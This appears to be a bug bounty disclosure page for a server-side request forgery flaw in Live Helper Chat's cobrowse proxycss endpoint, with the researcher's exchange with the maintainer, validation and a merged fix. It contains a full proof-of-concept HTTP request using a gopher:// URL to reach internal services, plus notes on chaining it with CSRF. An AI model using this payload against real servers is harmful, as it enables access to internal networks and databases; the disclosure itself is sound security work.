SSRF on index.php/cobrowse/proxycss/ in livehelperchat/livehelperchat


Reported on

Mar 29th 2022


Live Helper Chat is vulnerable to SSRF on the /index.php/cobrowse/proxycss endpoint. It's possible to make internal requests and see the response as an authenticated user, it's also possible to make an request with any protocol using goppher://.

Proof of Concept

  1. Request

GET /index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&css= HTTP/1.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: lhc_vid=10c9573dc50925e9141f; PHPSESSID=1f91a362084b1d87c4ebdf255fc32629
Connection: close

This could be used chained with the CSRF vulnerability to achieve the SSRF without authentication.


An attacker could make the application perform arbitrary requests.

We are processing your report and will contact the livehelperchat team within 24 hours. 3 months ago
We have contacted a member of the livehelperchat team and are waiting to hear back 3 months ago
3 months ago


Provide full steps to reproduce. As this is just a theoretical issue without real impact as all information sensitive URL's is protected via CSRF

Caio Lüders
3 months ago


Hi Remigijus,


1 . Login on 2 . Access

You will see the response of the local Nginx server.


SSRF are a high impact vulnerability, as an attacker can force the server to send requests. With this SSRF it's possible to access the internal network and cloud infrastructure. Using the gopher:// protocol an attacker can send requests in any protocol, not only HTTP, accessing the local MySQL database for example.

Altho the endpoint is only accessible for authenticated users, using the bug an attacker can put the malicious link on the [img] and the SSRF will trigger when the Admin access the message .

You can read more about SSRF here :

3 months ago


I don't see any problem with seeing default nginx webpage. Please provide real world POC

3 months ago


And the one with [img] tag I closed, because your POC is invalid as sensitive information is protected with CSRF.

Remigijus Kiminas validated this vulnerability 3 months ago
Caio Lüders has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on c41f28 3 months ago
The fix bounty has been dropped
to join this conversation